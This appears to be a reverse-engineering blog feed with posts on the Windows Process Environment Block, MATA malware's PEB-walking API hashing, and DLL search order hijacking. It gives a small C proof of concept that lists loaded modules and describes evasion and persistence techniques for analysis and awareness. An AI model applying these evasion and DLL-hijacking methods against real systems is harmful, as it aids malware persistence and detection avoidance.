In Windows, the program can fetch the CONTEXT via GetThreadContext to see if the debugging registers are used. A great example on how this is implemented can be found here[1]. If you are interested in trying to defeat it by yourself, you can try to beat the Section Hashing technique by yourself at root-me.org[2].

PEB: Where Magic Is Stored

22 August 2021 at 15:49

As a reverse engineer, every now and then you encounter a situation where you dive deeper into the internal structures of an operating system as usual. Be it out of simple curiosity, or because you need to understand how a binary uses specific parts of the operating system in certain ways . One of the more interesting structures in Windows is the Process Environment Block/PEB. In this article, I’d like to introduce you to this structure and talk about various use cases of how adversaries can abuse this structure for their own purposes.

Introducing PEB

The Process Environment Block is a critical structure in the Windows OS, most of its fields are not intended to be used by other than the operating system. It contains data structures that apply across a whole process and is stored in user-mode memory, which makes it accessible for the corresponding process. The structure contains valuable information about the running process, including:

  • whether the process is being debugged or not
  • which modules are loaded into memory
  • the command line used to invoke the process

All these information gives adversaries a number of possibilities to abuse it. The figure below shows the layout of the PEB structure:

typedef struct _PEB {
  BYTE                          Reserved1[2];
  BYTE                          BeingDebugged;
  BYTE                          Reserved2[1];
  PVOID                         Reserved3[2];
  PPEB_LDR_DATA                 Ldr;
  PRTL_USER_PROCESS_PARAMETERS  ProcessParameters;
  PVOID                         Reserved4[3];
  PVOID                         AtlThunkSListPtr;
  PVOID                         Reserved5;
  ULONG                         Reserved6;
  PVOID                         Reserved7;
  ULONG                         Reserved8;
  ULONG                         AtlThunkSListPtr32;
  PVOID                         Reserved9[45];
  BYTE                          Reserved10[96];
  PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
  BYTE                          Reserved11[128];
  PVOID                         Reserved12[1];
  ULONG                         SessionId;
} PEB, *PPEB;

Now that we’ve talked a little bit about the layout and purpose of the structure, let’s take a look at a few use cases.

Reading the BeingDebugged flag

The most obvious way is to check the BeingDebugged to identify, whether a debugger is attached to the process or not. Through reading the variable directly from memory instead of using usual suspects like NtQueryInformationProcess or IsDebuggerPresent, malware can prevent noisy WINAPI calls. This makes it harder to spot this technique.

However, most debuggers already take care of this. X64dbg for example, has an option to hide the Debugger by modifying the PEB structure at start of the debugging session.

Iterating through loaded modules

Another use case, could be iterating the loaded modules and discover DLLs injected into memory with purpose to overwatch the running process. To understand how to achieve this, we need to take a look at the PPEB_LDR_DATA structure included in PEB, which is provided by the Ldr variable:

typedef struct _PEB_LDR_DATA {
  BYTE       Reserved1[8];
  PVOID      Reserved2[3];
  LIST_ENTRY InMemoryOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;

PPEB_LDR_DATA contains the head to a doubly linked list named InMemoryOrderModuleList. Each item in this list is a structure from type LDR_DATA_TABLE_ENTRY, which contains all the information we need to iterate loaded modules. See the structure of LDR_DATA_TABLE_ENTRY below:

typedef struct _LDR_DATA_TABLE_ENTRY {
    PVOID Reserved1[2];
    LIST_ENTRY InMemoryOrderLinks;
    PVOID Reserved2[2];
    PVOID DllBase;
    PVOID EntryPoint;
    PVOID Reserved3;
    UNICODE_STRING FullDllName;
    BYTE Reserved4[8];
    PVOID Reserved5[3];
    union {
        ULONG CheckSum;
        PVOID Reserved6;
    };
    ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;

So by iterating the doubly linked list, we are able to discover the base address and full name of all modules loaded into memory of the running process. The snippet below is a small Proof of Concept. It iterates the linked list and prints the library name to stdout. I created it for the purpose of this blog article. You are free to use it, however I will also upload it to my github repo the upcoming days:

#include <Windows.h>
#include <iostream>
#include <shlwapi.h>


#define NO_STDIO_REDIRECT

typedef struct _UNICODE_STRING
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;


typedef struct _LDR_DATA_TABLE_ENTRY_MOD {
    LIST_ENTRY InMemoryOrderLinks;
    PVOID Reserved2[2];
    PVOID DllBase;
    PVOID EntryPoint;
    PVOID Reserved3;
    UNICODE_STRING FullDllName;
    BYTE Reserved4[8];
    PVOID Reserved5[3];
    union {
        ULONG CheckSum;
        PVOID Reserved6;
    };
    ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY_MOD, * PLDR_DATA_TABLE_ENTRY_MOD_MOD;




int main(int argc, char** argv[]){

 
    PLDR_DATA_TABLE_ENTRY_MOD_MOD lib = NULL;
    _asm {
        xor eax, eax
        mov eax, fs:[0x30]
        mov eax, [eax + 0xC]
        mov eax, [eax + 0x14]
        mov lib, eax
    };
    printf("[+] Initialised pointer to first LDR_DATA_TABLE_ENTRY_MOD\n");
    

    // Loop as long as we don't reach the head of the linked list again
    while ( lib->FullDllName.Buffer != NULL ) {

        printf("[+] %S\n", lib->FullDllName.Buffer);
        lib = (PLDR_DATA_TABLE_ENTRY_MOD_MOD)lib->InMemoryOrderLinks.Flink;
    }
    
    printf("[+] Done!\n");



	return 0;

If you are wondering how I am able to access the PEB in the code below, you should take a look at the inline assembly in the main method, especially the instruction mov eax, fs:[0x30]. FS is a segment register, similar to GS. FS can be used to access thread-specific memory. Offset 0x30 allows you to access the linear address of the Process Environment Block.

Finally, we want to take a look at a real world example of how PEB can be abused.

How the MATA Framework abuses PEB

This use case was introduced to me while reverse engineering a Windows variant of the MATA Framework. According to Kaspersky[1], the MATA Framework is used by the Lazarus group and targets multiple platforms.

Malware authors have a high interest in obfuscation, because it increases the time needed to reverse engineer it. One way to hide API calls is to use API Hashing. I have written about Danabot’s API Hashing[2] before and how to overcome it. MATA also uses this technique.

However instead of using the WIN API calls to retrieve the address of DLLs loaded into memory, MATA abuses the Process Environment Block to fetch base addresses. Let’s take a look at how MATA for Windows achieves this:

MATA API Hashing

The input of the APIHashing method takes an integer as the only parameter, this is the hash for the corresponding API call.

Figure 1: Call to APIHash method

Right after the prologue, it retrieves a pointer to PEB by reading it from the Thread Environment Block via the segment register GS. Similar to our proof of concept above, MATA now fetches the address to the head of the linked list provided by InMemoryOrderModuleList. Each item of the linked list provides the DLL base address of the corresponding loaded module.

From there, the malware reads the e_lfanew field, which contains the offset to the file header. By adding the base address, e_lfsanew and 0x88 it jumps directly to the data directories of the corresponding PE. From the data directories, MATA accesses the exported function names in a similar way as I’ve described in my blog article about DanaBot’s API Hashing[3]. The hashing algorithm is fairly simple. Each integer representation of a character is added and the result of the addition is ROR'd by 0xD consecutively each iteration. If the final hash matches the input parameter, the address to the function is retrieved. The following figure explains the function at a high level:

High level overview of API Hashing of MATA malware

Learning from each other

That’s it with the blog article, I hope you enjoyed it! There are probably way more use cases and real world cases of how the PEB is and and can be abused. If you can think of another one, feel free to leave a comment below and share it, so that we can learn from each other!

The DLL Search Order And Hijacking It

10 November 2021 at 07:52

If you ever used Process Monitor to track activity of a process, you might have encountered the following pattern:

Figure 1: Example of dnsapi.dll not being found in the application directory

The image above is a snippet from events captured by Process Monitor during the execution of x32dbg.exe on Windows 7. DNSAPI.DLL and IPHLPPAPI.DLL are persisted in the System directory, so you might question yourself:

Why would Windows try to search for either of these DLLs in the application directory first?

Operating Systems are very complex and so is the challenge of implementing an error-fault system to search for dependencies, like dynamic linked libraries. Today, we’ll talk about DLL Search Order and DLL Search Order Hijacking, in particular how it works and how adversaries can abuse it.

DLL Search Order

First, we have to talk about what happens when a PE File is executed on the Windows system.

The majority of native binaries you encounter on Windows are linked dynamically. Linked dynamically means that upon start of the execution, it uses information which are embedded inside the binary to locate DLLs that are essential for this process. In comparison with statically linked binaries, when linked dynamically the executable will use the libraries provided by the OS instead of having them compiled into the executable itself.

Before the dynamically linked executable can use or load these libraries, it will have to know where these dependencies are persisted on disk or if they are already in memory. This is where the DLL Search Order makes its appearance. To keep it simple, we will focus only on Windows Desktop Applications.

Pre-Checks and In-Memory Search

Before the Windows OS starts searching for the needed DLL on disk, it will first attempt to find the needed module in memory. If a DLL is already in memory, it will not loaded it again. Now this part is a little bit complicated and out of context for this blog article, we would have to define what “loaded” even means. If you are more interested in the first check, I advise you to look up the official Microsoft documentation[1].

If the memory check fails, Windows can fall back to using a list of known DLLs. if the needed library is part of that list, it will use the copy of the known DLL. The list of known DLLs are persisted in the Windows Registry.

Figure 2: List of KnownDlls on Windows 7

On-Disk Search

If the first two checks fail, the OS will have to search for the DLL on disk. Depending on the OS Settings, Windows will use a different search order. Per default, Windows enables the DLL Search Mode feature to harden the system and prevent DLL Search Order Hijacking attacks, a technique we will explain in the upcoming section.

The key to the feature is as follows:

  • HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode

Let’s take a look at the differences of the search order depending whether SafeDllSearchMode is enabled or not.

Figure 3: DLL Search Order flow

We clearly see that the current directory is prioritised if SafeDllSearchMode is disabled and this can be abused by adversaries. The art of abusing this search order flow is called DLL Search Order Hijacking.

DLL Search Order Hijacking

Adversaries can abuse the search order flow displayed above to load their own malicious DLLs instead of the legitimate ones into memory. There are many ways this technique can be used. However, it is more effective in achieving persistence on the target system then initial execution.

Let’s take a step back and revisit our example from above:

  • x32dbg.exe tries to load DNSAPI.DLL
  • DNSAPI.DLL is not in the list of known DLLs and is also not loaded into memory.
  • Since SafeDllSearchMode is enabled, it will fall back to the system directory if not found in the application directory

What would happen, if we craft and place a malicious DLL, named DNSAPI.DLL into the application directory?

We would be able to hijack the search order flow and force a legitimate application to load our malicious code into memory.

Practical Use Case

Let’s take a look at a simple practical example. Our application calls LoadLibraryA and tries to load dnsapi.dll like in our example from above. Next we craft a small DLL file, which does nothing else but create a message box in the DLLMain function. Once the DLL is loaded into memory, the main function will be triggered.

In the first run, we do not place the crafted DLL in the application directory. As expected, Windows will load dnsapi.dll from the system directory:

Next, we will now name our crafted DLL dnsapi.dll and place it in the application directory:

Whoops! I think we can all think of a couple use cases of how APT groups and malware can abuse this technique to achieve persistence on the victim’s system.

Real world examples and APTs

For the sake of keeping it simple and explaining the core principles behind this persistence technique, we’ve build a very simple use case here. Of course, the real world looks a little bit different and usually attackers have to take into account:

  • Endpoint Security solutions with behaviour based detections, preventing such attacks with signatures
  • Programmatic dependencies, which won’t allow you to just replace a DLL in an application directory and hope that it will work just fine
  • and many more

However, if you never heard about this technique, I hope I was able to create some awareness for it!

❌
❌